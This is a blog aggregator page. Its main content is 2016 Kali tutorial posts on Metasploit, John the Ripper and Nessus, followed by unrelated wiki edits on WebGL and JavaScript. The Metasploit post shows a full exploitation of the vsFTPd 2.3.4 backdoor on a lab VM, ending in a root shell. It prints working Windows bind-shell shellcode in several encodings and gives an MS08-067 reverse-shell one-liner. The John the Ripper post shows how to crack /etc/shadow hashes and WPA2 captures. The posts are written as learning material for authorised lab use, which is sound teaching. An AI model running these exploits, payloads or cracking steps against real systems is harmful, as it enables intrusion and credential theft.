
Useful tools like for:

  • intormation gathering
  • enumeration
  • port scanning
  • connecting to SQL databases
  • etc

Exploit modules

Modules used to deliver exploit code to a target system.

Post modules

Post exploitation tools for things like extracting passwords hashes/access tokens, taking screenshots, key-logging and downloading files.

Payload modules

Malicious payloads used after an exploitation. In Metasploit, it’s better to upload a copy of “meterpreter” payload, which opens a meterpreter backdoor smoothly.

Testing Environment

Okay, since what we are doing here may create some changes (or you can say damages) on the target machine. We can’t do this on a deployed machine without permission. Therefore, I setup a Metasploitable virtual machine as my target, which contains lots of vulnerabilities by default.

Both the target (Metasploitable) and the attacker (Kali) are virtual machines under the same local network in my following tests.

Working Flow

Here’s a demo flow using Metasploit.

1. Information Gathering

Host Discovery

First, we have to locate the machine by scanning my local network (192.168.0.x).

I’m using ARP scanning:

msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options (auxiliary/scanner/discovery/arp_sweep):

Name Current Setting Required Description
---- --------------- -------- -----------
INTERFACE no The name of the interface
RHOSTS yes The target address range or CIDR identifier
SHOST no Source IP Address
SMAC no Source MAC Address
THREADS 1 yes The number of concurrent threads
TIMEOUT 5 yes The number of seconds to wait for new data

msf auxiliary(arp_sweep) > set RHOSTS 192.168.63.0-255
RHOSTS => 192.168.63.0-255
msf auxiliary(arp_sweep) > run

[*] 192.168.63.1 appears to be up (VMware, Inc.).
[*] 192.168.63.2 appears to be up (VMware, Inc.).
[*] 192.168.63.156 appears to be up (VMware, Inc.).
[*] 192.168.63.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, 192.168.63.156 would be our target machine since others don’t seem like a normal device.

In addition, of course, one can use Nmap to do all the work for this part instead:

nmap -v -sV 192.168.63.1/24

Port Scanning

Then, we scan the open port of our target machine (192.168.63.156):

msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
CONCURRENCY 10 yes The number of concurrent ports to check per host
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS 192.168.63.156 yes The target address range or CIDR identifier
THREADS 50 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf auxiliary(tcp) > run

[*] 192.168.63.156:25 - TCP OPEN
[*] 192.168.63.156:23 - TCP OPEN
[*] 192.168.63.156:22 - TCP OPEN
[*] 192.168.63.156:21 - TCP OPEN
[*] 192.168.63.156:53 - TCP OPEN
[*] 192.168.63.156:80 - TCP OPEN
… (dismiss)

By knowing which ports the machine is using, we can know which services are running on it.

2. Find Vulnerability

To find vulnerability, we may need to know the version of the service, and look it out on the database to see if there’s any known vulnerability.

Find Versions

SSH:

msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ssh_version) > run

[*] 192.168.63.156:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

FTP:

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 192.168.63.156
RHOSTS => 192.168.63.156
msf auxiliary(ftp_version) > run

[*] 192.168.63.156:21 FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see, the target machine is running vsFTPd 2.3.4.

Check Database

Let’s focus on vsFTPd, which is more likely to be vulnerable comparing to SSH. So, go to exploit-db, search keyword “vsFTPd”, and luckily we got “VSFTPD 2.3.4 - Backdoor Command Execution”.

To sum what we’ve got so far: the target machine is running an outdated service which contains a well-known flaw.

Find the Exploit Method

Then, let’s search it on your metesploit:

msf > search vsftpd

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution

Nice, the module exploit/unix/ftp/vsftpd_234_backdoor is what we need now.

3. Exploit

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/unix/interact normal Unix Command, Interact with Established Connection

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.63.156 yes The target address
RPORT 21 yes The target port


Payload options (cmd/unix/interact):

Name Current Setting Required Description
---- --------------- -------- -----------


Exploit target:

Id Name
-- ----
0 Automatic

There’s only one payload we can apply for this exploit, cmd/unix/interact, which means that the interaction will be setup directly after exploitation.

Now, we succeed:

msf exploit(vsftpd_234_backdoor) > run

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 2 opened (192.168.63.155:53640 -> 192.168.63.156:6200) at 2016-03-11 21:22:39 +0800

whoami
root
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

Custom Payload

In some cases, we may need custom payloads, like what I did for Secure Programming class in 2014.

Pick a payload and its generate shellcode (using payload/windows/shell_bind_tcp as example here):

msf > use payload/windows/shell_bind_tcp
msf payload(shell_bind_tcp) > generate
# windows/shell_bind_tcp - 328 bytes
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"

Avoid the shellcode contains specific characters (take \x00 as example):

msf payload(shell_bind_tcp) > generate -b '\x00'
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\xbf\x41\x3a\x72\xae\xda\xdf\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x53\x31\x78\x12\x03\x78\x12\x83\x81\x3e\x90\x5b\xfd" +
"\xd7\xd6\xa4\xfd\x27\xb7\x2d\x18\x16\xf7\x4a\x69\x09\xc7" +
"\x19\x3f\xa6\xac\x4c\xab\x3d\xc0\x58\xdc\xf6\x6f\xbf\xd3" +
"\x07\xc3\x83\x72\x84\x1e\xd0\x54\xb5\xd0\x25\x95\xf2\x0d" +
"\xc7\xc7\xab\x5a\x7a\xf7\xd8\x17\x47\x7c\x92\xb6\xcf\x61" +
"\x63\xb8\xfe\x34\xff\xe3\x20\xb7\x2c\x98\x68\xaf\x31\xa5" +
"\x23\x44\x81\x51\xb2\x8c\xdb\x9a\x19\xf1\xd3\x68\x63\x36" +
"\xd3\x92\x16\x4e\x27\x2e\x21\x95\x55\xf4\xa4\x0d\xfd\x7f" +
"\x1e\xe9\xff\xac\xf9\x7a\xf3\x19\x8d\x24\x10\x9f\x42\x5f" +
"\x2c\x14\x65\x8f\xa4\x6e\x42\x0b\xec\x35\xeb\x0a\x48\x9b" +
"\x14\x4c\x33\x44\xb1\x07\xde\x91\xc8\x4a\xb7\x56\xe1\x74" +
"\x47\xf1\x72\x07\x75\x5e\x29\x8f\x35\x17\xf7\x48\x39\x02" +
"\x4f\xc6\xc4\xad\xb0\xcf\x02\xf9\xe0\x67\xa2\x82\x6a\x77" +
"\x4b\x57\x06\x7f\xea\x08\x35\x82\x4c\xf9\xf9\x2c\x25\x13" +
"\xf6\x13\x55\x1c\xdc\x3c\xfe\xe1\xdf\x53\xa3\x6c\x39\x39" +
"\x4b\x39\x91\xd5\xa9\x1e\x2a\x42\xd1\x74\x02\xe4\x9a\x9e" +
"\x95\x0b\x1b\xb5\xb1\x9b\x90\xda\x05\xba\xa6\xf6\x2d\xab" +
"\x31\x8c\xbf\x9e\xa0\x91\x95\x48\x40\x03\x72\x88\x0f\x38" +
"\x2d\xdf\x58\x8e\x24\xb5\x74\xa9\x9e\xab\x84\x2f\xd8\x6f" +
"\x53\x8c\xe7\x6e\x16\xa8\xc3\x60\xee\x31\x48\xd4\xbe\x67" +
"\x06\x82\x78\xde\xe8\x7c\xd3\x8d\xa2\xe8\xa2\xfd\x74\x6e" +
"\xab\x2b\x03\x8e\x1a\x82\x52\xb1\x93\x42\x53\xca\xc9\xf2" +
"\x9c\x01\x4a\x02\xd7\x0b\xfb\x8b\xbe\xde\xb9\xd1\x40\x35" +
"\xfd\xef\xc2\xbf\x7e\x14\xda\xca\x7b\x50\x5c\x27\xf6\xc9" +
"\x09\x47\xa5\xea\x1b"

So, we get a payload withtou \x00, which is reasonably longer than the previous one.

Then, we can apply some encoders onto the shellcode like. To list all available encoders:

msf payload(shell_bind_tcp) > show encoders

Encoders
========

Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/echo good Echo Command Encoder
cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/perl normal Perl Command Encoder
cmd/powershell_base64 excellent Powershell Base64 Command Encoder
cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar manual The EICAR Encoder
… (dismiss)

Generate code with decoder:

msf payload(shell_bind_tcp) > generate -e x86/nonalpha
# windows/shell_bind_tcp - 470 bytes
# http://www.metasploit.com
# Encoder: x86/nonalpha
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x6a\x8b\xd7" +
"\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28\x07\xeb" +
"\xf1\xeb\x6f\xe8\xe2\xff\xff\xff\x17\x2b\x29\x29\x09\x31" +
"\x1a\x29\x24\x29\x31\x2f\x03\x33\x2a\x22\x32\x32\x06\x06" +
"\x23\x23\x15\x30\x23\x37\x1a\x22\x21\x2a\x21\x13\x13\x04" +
"\x08\x27\x13\x2f\x04\x27\x2b\x13\x10\x11\x22\x2b\x2b\x2b" +
"\x13\x13\x11\x25\x24\x13\x14\x24\x13\x24\x13\x07\x24\x13" +
"\x06\x0d\x2e\x1a\x13\x18\x0e\x17\x24\x24\x24\x11\x22\x25" +
"\x15\x37\x37\x37\x27\x2b\x25\x25\x25\x35\x25\x2d\x25\x25" +
"\x28\x25\x13\x02\x2d\x25\x35\x13\x25\x13\x06\x34\x09\x0c" +
"\x11\x28\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x7b" +
"\x8b\x7b\x30\x8b\x7b\x0c\x8b\x7b\x14\x8b\x7b\x28\x0f\xb7" +
"\x7b\x26\x31\xff\xac\x3c\x7b\x7c\x02\x2c\x20\xc1\xcf\x0d" +
"\x01\xc7\xe2\xf2\x7b\x7b\x8b\x7b\x10\x8b\x7b\x3c\x8b\x7b" +
"\x11\x7b\xe3\x7b\x01\xd1\x7b\x8b\x7b\x20\x01\xd3\x8b\x7b" +
"\x18\xe3\x3a\x7b\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf" +
"\x0d\x01\xc7\x38\xe0\x7b\xf6\x03\x7d\xf8\x3b\x7d\x24\x7b" +
"\xe4\x7b\x8b\x7b\x24\x01\xd3\x7b\x8b\x0c\x7b\x8b\x7b\x1c" +
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x7b\x24\x24\x5b\x5b\x7b" +
"\x7b\x7b\x7b\xff\xe0\x5f\x5f\x7b\x8b\x12\xeb\x8d\x5d\x7b" +
"\x33\x32\x00\x00\x7b\x7b\x7b\x32\x5f\x7b\x7b\x7b\x7b\x26" +
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x7b\x7b\x7b\x29" +
"\x80\x7b\x00\xff\xd5\x7b\x08\x7b\x7b\xe2\xfd\x40\x7b\x40" +
"\x7b\x7b\xea\x0f\xdf\xe0\xff\xd5\x97\x7b\x02\x00\x11\x5c" +
"\x89\xe6\x7b\x10\x7b\x7b\x7b\xc2\xdb\x37\x7b\xff\xd5\x7b" +
"\x7b\xb7\xe9\x38\xff\xff\xd5\x7b\x7b\x7b\xec\x3b\xe1\xff" +
"\xd5\x7b\x97\x7b\x7b\x7b\x7b\x7b\xff\xd5\x7b\x7b\x7b\x7b" +
"\x00\x89\xe3\x7b\x7b\x7b\x31\xf6\x7b\x12\x7b\x7b\xe2\xfd" +
"\x7b\xc7\x7b\x24\x3c\x01\x01\x8d\x7b\x24\x10\xc6\x00\x7b" +
"\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b\x7b" +
"\xcc\x3f\x86\xff\xd5\x89\xe0\x7b\x7b\x7b\xff\x30\x7b\x08" +
"\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x7b\x7b\xa6\x95\xbd" +
"\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x7b\x05\xbb\x7b" +
"\x13\x7b\x7b\x7b\x00\x7b\xff\xd5"

or, all together:

msf payload(shell_bind_tcp) > generate -b '\x00' -e x86/alpha_mixed -f output.txt
[*] Writing 3347 bytes to output.txt...
msf payload(shell_bind_tcp) > cat output.txt
[*] exec: cat output.txt

# windows/shell_bind_tcp - 718 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf =
"\x89\xe5\xd9\xe5\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x49\x6c\x79\x78\x4c\x42\x65\x50\x75\x50" +
"\x33\x30\x43\x50\x6b\x39\x5a\x45\x56\x51\x4f\x30\x75\x34" +
"\x4c\x4b\x50\x50\x64\x70\x6c\x4b\x70\x52\x66\x6c\x6c\x4b" +
"\x46\x32\x77\x64\x6e\x6b\x62\x52\x76\x48\x54\x4f\x68\x37" +
"\x70\x4a\x76\x46\x74\x71\x79\x6f\x4e\x4c\x67\x4c\x43\x51" +
"\x63\x4c\x63\x32\x34\x6c\x31\x30\x4b\x71\x58\x4f\x54\x4d" +
"\x53\x31\x48\x47\x6a\x42\x78\x72\x72\x72\x31\x47\x6e\x6b" +
"\x36\x32\x74\x50\x6c\x4b\x50\x4a\x75\x6c\x4c\x4b\x50\x4c" +
"\x42\x31\x63\x48\x68\x63\x52\x68\x76\x61\x6a\x71\x50\x51" +
"\x6e\x6b\x50\x59\x71\x30\x36\x61\x6a\x73\x6e\x6b\x73\x79" +
"\x64\x58\x6b\x53\x56\x5a\x47\x39\x6c\x4b\x35\x64\x6e\x6b" +
"\x55\x51\x39\x46\x75\x61\x4b\x4f\x4e\x4c\x6f\x31\x38\x4f" +
"\x66\x6d\x43\x31\x49\x57\x45\x68\x49\x70\x74\x35\x4c\x36" +
"\x54\x43\x73\x4d\x39\x68\x67\x4b\x33\x4d\x46\x44\x70\x75" +
"\x48\x64\x76\x38\x6c\x4b\x53\x68\x67\x54\x45\x51\x78\x53" +
"\x62\x46\x6e\x6b\x74\x4c\x72\x6b\x6e\x6b\x56\x38\x65\x4c" +
"\x36\x61\x58\x53\x4e\x6b\x46\x64\x6e\x6b\x65\x51\x4e\x30" +
"\x6c\x49\x32\x64\x75\x74\x47\x54\x51\x4b\x53\x6b\x61\x71" +
"\x63\x69\x31\x4a\x36\x31\x59\x6f\x6b\x50\x63\x6f\x53\x6f" +
"\x73\x6a\x6c\x4b\x32\x32\x6a\x4b\x6c\x4d\x71\x4d\x51\x78" +
"\x37\x43\x65\x62\x73\x30\x45\x50\x32\x48\x53\x47\x44\x33" +
"\x56\x52\x51\x4f\x70\x54\x71\x78\x50\x4c\x30\x77\x74\x66" +
"\x67\x77\x6b\x4f\x4e\x35\x4c\x78\x5a\x30\x65\x51\x37\x70" +
"\x37\x70\x51\x39\x4f\x34\x51\x44\x70\x50\x30\x68\x75\x79" +
"\x6b\x30\x72\x4b\x37\x70\x6b\x4f\x4e\x35\x63\x5a\x77\x78" +
"\x31\x49\x32\x70\x48\x62\x6b\x4d\x77\x30\x42\x70\x61\x50" +
"\x56\x30\x65\x38\x69\x7a\x66\x6f\x79\x4f\x69\x70\x39\x6f" +
"\x39\x45\x6e\x77\x52\x48\x67\x72\x67\x70\x44\x51\x43\x6c" +
"\x4e\x69\x6b\x56\x63\x5a\x54\x50\x32\x76\x71\x47\x31\x78" +
"\x4f\x32\x49\x4b\x37\x47\x32\x47\x69\x6f\x78\x55\x36\x37" +
"\x71\x78\x4d\x67\x5a\x49\x46\x58\x4b\x4f\x4b\x4f\x6a\x75" +
"\x50\x57\x45\x38\x74\x34\x7a\x4c\x65\x6b\x59\x71\x6b\x4f" +
"\x68\x55\x52\x77\x4a\x37\x63\x58\x43\x45\x62\x4e\x32\x6d" +
"\x31\x71\x79\x6f\x79\x45\x30\x68\x71\x73\x62\x4d\x62\x44" +
"\x43\x30\x6e\x69\x59\x73\x52\x77\x66\x37\x30\x57\x66\x51" +
"\x4b\x46\x63\x5a\x62\x32\x63\x69\x70\x56\x6b\x52\x39\x6d" +
"\x63\x56\x6f\x37\x73\x74\x55\x74\x77\x4c\x57\x71\x56\x61" +
"\x4c\x4d\x53\x74\x44\x64\x62\x30\x6a\x66\x37\x70\x51\x54" +
"\x42\x74\x52\x70\x61\x46\x66\x36\x70\x56\x71\x56\x43\x66" +
"\x32\x6e\x63\x66\x70\x56\x31\x43\x72\x76\x33\x58\x31\x69" +
"\x68\x4c\x75\x6f\x4c\x46\x69\x6f\x4e\x35\x4f\x79\x39\x70" +
"\x52\x6e\x70\x56\x77\x36\x6b\x4f\x30\x30\x61\x78\x53\x38" +
"\x4b\x37\x57\x6d\x33\x50\x39\x6f\x38\x55\x4f\x4b\x68\x70" +
"\x6d\x65\x6d\x72\x51\x46\x50\x68\x59\x36\x6e\x75\x4f\x4d" +
"\x6f\x6d\x6b\x4f\x38\x55\x67\x4c\x47\x76\x73\x4c\x46\x6a" +
"\x4d\x50\x6b\x4b\x49\x70\x74\x35\x34\x45\x4d\x6b\x57\x37" +
"\x76\x73\x74\x32\x32\x4f\x33\x5a\x55\x50\x36\x33\x79\x6f" +
"\x6a\x75\x41\x41"

Scripting

Metasploit framework supports the users write scripts to control the process. There are three ways to read a script:

  1. > msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST [IP]; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST [IP]; run"  
  2. > msfconsole -r my_script.rc
  3. (in msfconsole)

    msf > resource my_script.rc

Database

When conducting a penetration test, it is frequently a challenge to keep track o feverything you have done to the target network. This is where having a database configured can be a great timesaver. Metasploit has build-in support for the PostreSQL database system. (Reference)

Here are some helpful commands:

  • help database
  • hosts
  • services
  • db_nmap: same as nmap but results will be saved in to current database
  • db_import
  • db_export -f xml [filepath for xml]

Conclusion

Metasploit is a powerful tool that allows people can raise attacks with the aid of its exploit database. Although this post only contains the basic usages of Metasploit with one example which is hardly to describe its strength, I will keep update this post if I found anything new and worth sharing.

by Heron Yang (noreply@blogger.com) at March 19, 2016 12:34 PM

Kali Tool Series - John the Ripper

John the Ripper is a tool for getting passwords by bruteforcing. Make sure you don’t apply any of followings more others’ accounts or services. Try your own accounts or services.

Get Password of an Unix-like Machine

Followings are only work with an unix-like machine, and the user had already gained the access of files on it. That is, we need /etc/passwd and /etc/shadow (only /etc/passwd for acient machine).

> unshadow /etc/passwd /etc/shadow > ~/passwd

Use John’s default word list to crack the password:

> john ~/passwd

Use custom wordlist:

> john --wordlist=word.list ~/passwd

where word.list is your custom list.

To show the result:

> john --show ~/passwd

Crack Wifi

Use Wordlist (WPA2)

Use wireshark or airodump-ng to get .cap file of the traffic. Then:

> aircrack-ng –w wordlist.lst -b 00:0c:29:80:9a:85 my_traffic*.cap

where -b option indicates the MAC of your targetting BSSID, and input files are those .cap files.

Try All

Another solution is to try every possible password which is guaranteed to found the password, but it might also take forever.

> john -stdout -incremental | aircrack-ng -b 00:0c:29:80:9a:85 -w - my_traffic*.cap

Session Control

To run a long password testing process, we can make it run in the background:

> john --session=all_rules_session --wordlist=all.lst &

To check the session status:

> john --status=all_rules_session
0g 0:00:00:02 2/3 0g/s 411.5p/s 411.5c/s 411.5C/s

To restore the session:

> john --restore

Password Wordlist

For longer wordlist, one can find it online. However, there are some existing wordlist on Kali for users to apply.

> ls /usr/share/wordlists/
dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi metasploit metasploit-jtr nmap.lst rockyou.txt.gz sqlmap.txt termineter.txt wfuzz

they are wordlist files from different applications:

> file /usr/share/wordlists/*
/usr/share/wordlists/dirb: symbolic link to /usr/share/dirb/wordlists
/usr/share/wordlists/dirbuster: symbolic link to /usr/share/dirbuster/wordlists
...
/usr/share/wordlists/wfuzz: symbolic link to /usr/share/wfuzz/wordlist

Interestingly, the best wordlist is actually hidden in the rockyou.txt.gz, so:

> gzip -dc < rockyou.txt.gz > ~/wordlist.txt

then we got wordlist.txt.

Resource

by Heron Yang (noreply@blogger.com) at March 19, 2016 12:33 PM

March 14, 2016

Kali Tool Series - Nessus

Nessus is an open source vulnerability scanner, which scans a network for potential security risks and provide detailed reports.
Few facts about Nessus:
  • founded by Renuad Deraison in 1998
  • supports multiple systems: Windows, Linux, Mac OS X, Sun, Solaris, etc

Feature

  • host/port discovery
  • identifies vulnerabilities
  • checks whether the systems have the latest software patches
  • tries with default passwords, common passwords on system accounts
  • malware/botnet detection
(from reference 1 and reference 2)

Install and Setup

Download Nessus at its official site (registration is required, Home version is for free)
After installation, open https://localhost:8834/ on your machine to start Nessus.

Component

  • Reports: reports from all the past scans of a target or a set of targets
  • Scans: configure or run a new scan
  • Policies: configure the things you would like to run for the scans
  • Users: different users may have different permission to apply different policies
(Reference)

Policy

Open https://localhost:8834/, and click on “+New Policy” button in the Policy tab.
The information of scanner templates provided by the policy wizard can be found here.

Settings

  • Basics
    • general: name / description
    • permission: private / share
  • Discovery: host disvocery / port scanning / service discovery
  • Assessment: for “web application” only
  • Report: configure the scan reports
  • Advanced: performance settings, additional checks, and logging features

Scan

Click on “+New Scan” button, then pick scanner template, or user created policy.

General

  • name
  • description
  • folder
  • scanner
  • targets: IP or domain name (ex. 192.168.1.0/24, 192.168.2.1, example.com)
  • upload targets: a file that contains target list

Schedule

Default is disabled.
  • launch: pick its frequency - once, daily, weekly, monthly, or yearly
  • starts on: start time
  • time zone
  • summary

Email Notification

Setting up SMTP is required.

Launch

Click on the play icon or the “launch” button, the scan will start directly.

View Results

The result page

  • Configure: directs back to the scan settings
  • Audit Trail: pulls up the audit trail dialogue
  • Launch
  • Export: allows you to save the scan result in Nessus (.nessus), PDF, HTML, CSV, or Nessus DB.

Turn On/Off Nessus

Nessus runs as service in background as default.
To turn on:
sudo launchctl load -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist
To turn off:
sudo launchctl unload -w /Library/LaunchDaemons/com.tenablesecurity.nessusd.plist

by Heron Yang (noreply@blogger.com) at March 14, 2016 06:35 AM

February 29, 2016

ThreeJS

Created page with "* [http://davidscottlyons.com/threejs/presentations/frontporch14/#slide-1 Intro to WebGL with Three.js] by David Scott Lyons == See Also == * OpenGL"

New page

* [http://davidscottlyons.com/threejs/presentations/frontporch14/#slide-1 Intro to WebGL with Three.js] by David Scott Lyons

== See Also ==
* [[OpenGL]]

by Scott.tsai at February 29, 2016 04:15 AM

February 28, 2016

WebGL

← Older revision Revision as of 20:42, 28 February 2016
(One intermediate revision by one user not shown)
Line 1: Line 1:
* [http://gdd11-webgl.appspot.com/#1 Enter the Third Dimension: Introduction to WebGL Interactive Slides from Google Developer Day 2011 by Ilmari Heikkinen]
+
* [http://gdd11-webgl.appspot.com/#1 Enter the Third Dimension: Introduction to WebGL] -  Interactive Slides from Google Developer Day 2011 by Ilmari Heikkinen
  
 
== See Also ==
 
== See Also ==
 
* [[OpenGL]]
 
* [[OpenGL]]

by Scott.tsai at February 28, 2016 08:42 PM

WebGL

Created page with "* [http://gdd11-webgl.appspot.com/#1 Enter the Third Dimension: Introduction to WebGL Interactive Slides from Google Developer Day 2011 by Ilmari Heikkinen] == See Also == * ..."

New page

* [http://gdd11-webgl.appspot.com/#1 Enter the Third Dimension: Introduction to WebGL Interactive Slides from Google Developer Day 2011 by Ilmari Heikkinen]

== See Also ==
* [[OpenGL]]

by Scott.tsai at February 28, 2016 08:42 PM

February 23, 2016

CPU

Created page with "== See Also == Computer Architecture"

New page

== See Also ==
[[Computer Architecture]]

by Scott.tsai at February 23, 2016 08:25 PM

Hardware

← Older revision Revision as of 20:24, 23 February 2016
Line 1: Line 1:
 +
== See Also ==
 
* [[Hardware Interface Reverse Engineering]]
 
* [[Hardware Interface Reverse Engineering]]
 
* [[Hardware Interfaces]]
 
* [[Hardware Interfaces]]
 
* [[DIMM]]
 
* [[DIMM]]
 +
* [[CPU]]

by Scott.tsai at February 23, 2016 08:24 PM

February 22, 2016

Javascript

Warts

← Older revision Revision as of 23:10, 22 February 2016
(3 intermediate revisions by one user not shown)
Line 1: Line 1:
 +
== Tutorials ==
 +
* [https://gist.github.com/yig/8744917 JavaScript reference for non-JavaScript programmers] by Yotam Gingold
 
* [http://ejohn.org/apps/learn/ Learning Advanced JavaScript by John Resig]
 
* [http://ejohn.org/apps/learn/ Learning Advanced JavaScript by John Resig]
 
* [http://eloquentjavascript.net/ Eloquent JavaScript An opinionated guide to programming by Marijn Haverbeke]
 
* [http://eloquentjavascript.net/ Eloquent JavaScript An opinionated guide to programming by Marijn Haverbeke]
Line 4: Line 6:
  
 
== Warts ==
 
== Warts ==
 +
# Must use '===' for equality since <code>'1' == 1 -> true</code>
 +
# '===' is "shallow", i.e. <code>[1, 2] === [1, 2] -> false</code>
 
# Container types don't sort lexicographically but are sorted by their string representations, ex: ['a', 2] > ['a', 10]
 
# Container types don't sort lexicographically but are sorted by their string representations, ex: ['a', 2] > ['a', 10]
 +
# <code>Array(1, 2) -> [1, 2]</code> but <code>Array(10)</code> allocates an array of length 10, filled with <code>undefined</code>.
 +
## Assigning to Array.length preallocates space. Assigning length to 0 frees space.
 +
# When calling functions normally 'this' is <code>undefined</code> in "strict mode" and  <code>window</code> otherwise in ES5:
 +
<pre>function f() { return this; }
 +
f() -> window    // default
 +
f() -> undefined  // "use strict";
 +
</pre>
 +
# Dictionary (object) keys are always strings, and can't be other immutable types
 
# The boolean interpretation of some built-in types are wrong, ex: Boolean([]) -> true
 
# The boolean interpretation of some built-in types are wrong, ex: Boolean([]) -> true
 +
# Broken Unicode support: https://mathiasbynens.be/notes/javascript-unicode
 
# No signed or unsigned ints, only floats. (But see the new [https://developer.mozilla.org/en/JavaScript_typed_arrays typed arrays] support)
 
